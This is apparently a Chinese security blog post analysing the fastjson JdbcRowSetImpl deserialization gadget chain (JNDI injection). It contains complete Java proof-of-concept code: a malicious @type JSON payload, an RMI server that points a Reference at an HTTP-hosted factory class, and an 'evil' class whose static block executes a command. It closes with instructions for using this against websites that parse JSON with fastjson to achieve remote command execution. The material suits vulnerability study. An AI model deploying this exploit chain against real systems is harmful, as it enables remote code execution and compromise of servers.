fastjson反序列化-JdbcRowSetImpl利用链

JdbcRowSetImpl利用链

fastjson反序列化JdbcRowSetImpl - Afant1 - 博客园 (cnblogs.com)

这里涉及了JNDI与RMI的概念。

其本质为JNDI注入。

附上示例代码

JdbcRowSetImplPoC.java

package org.lain.poc.poclist;

import com.alibaba.fastjson.JSONObject;

import com.alibaba.fastjson.parser.ParserConfig;

/**

 * @author: ZH3FENG

 * @Date: 下午7:53 2017/12/11

 * @Modified By:

 * @Description: Gadget com.sun.rowset.JdbcRowSetImpl

 *

 *               setAutoCommit() -> connect() -> InitialContext.lookup()

 */

public class JdbcRowSetImplPoC {

    public static void testJdbcRowSetImpl(String dataSourceName){

        ParserConfig config = new ParserConfig();

        config.setAutoTypeSupport(true);//

        String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\","

                + "\"dataSourceName\":\"" + dataSourceName + "\","

                + "\"autoCommit\":\"true\"}";

        System.out.println(payload);

        try{

            JSONObject.parse(payload,config);

        }catch (Exception e){

            e.printStackTrace();

        }

    }

}

RMIServer.java

package org.lain.poc.jndi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;

import java.rmi.registry.LocateRegistry;

import java.rmi.registry.Registry;

/**

 * @author: lanqihe

 * @Date: 下午8:01 2017/12/11

 * @Modified By:

 * @Description: 本地注册一个register，并将恶意的类绑定

 */

public class RMIServer {

    public static void main(String argv[]) {

        try {

            Registry  registry =  LocateRegistry.createRegistry(1090);

            //如果通过rmi无法找到org.lain.poc.jndi.EvilObjectFactory，则尝试从factoryLocation 获取

            //因此，本地测试的话，如果factory正确，factoryLocation随便填

            //把一个对象绑定到rmi注册表中，这个对象需要继承UnicastRemoteObject，但是Reference没有继承它，所以我们还需要封装一下它，用 ReferenceWrapper 包裹一下Reference实例对象，这样就可以将其绑定到rmi注册表，并被远程访问到了

            Reference reference = new Reference("EvilObject",

                    "org.lain.poc.jndi.EvilObjectFactory",

                    "http://localhost:9999/" );

            //客户端通过evil查找，获取到EvilObject

            registry.bind("evil", new ReferenceWrapper(reference));

            System.out.println("Ready!");

            System.out.println("Waiting for connection......");

        } catch (Exception e) {

            System.out.println("RMIServer: " + e.getMessage());

            e.printStackTrace();

        }

    }

}

EvilObject.java

package org.lain.poc.jndi;

import java.io.IOException;

/**

 * @author: ZH3FENG

 * @Date: 上午10:18 2017/12/12

 * @Modified By:

 * @Description: 模拟一个恶意类，静态代码块执行命令

 */

public class EvilObject {

    public EvilObject(){

        System.out.println("Hi!");

    }

    /**

     * 简单的命令执行

     */

    static {

        try {

            Runtime.getRuntime().exec("calc");

        }catch (IOException e){

            //ignore

        }

    }

}

我们在JSONObject.parse方法下断点调试

还是调用了parse.Object,步入

调用deserialze方法，进行反序列化

接下来会对JdbcRowSetImpl进行 初始化

在调用完构造函数后，parseObject还会去调用set方法。

根据poc的字段，可以在setDataSourceName与setAutoCommit下断点。

发现确实调用了这两个函数，在setDataSourceName方法中设置了数据源，setAutoCommit方法中，调用了connect方法。

connect方法

lookup方法

decodeObject中就是解析reference，之后调用getOnjectInstance去实例化对象。

调用流程总结：

具体利用方法：

Fastjson反序列化漏洞利用 - 简书 (jianshu.com)

搭建一个rmi服务器和一个http服务器

将exp类部署到http服务器上。

如果目标网站存在fastjson包，且有json格式数据的输入点。则可以构造json数据，达到远程调用http服务器上的类，造成命令执行。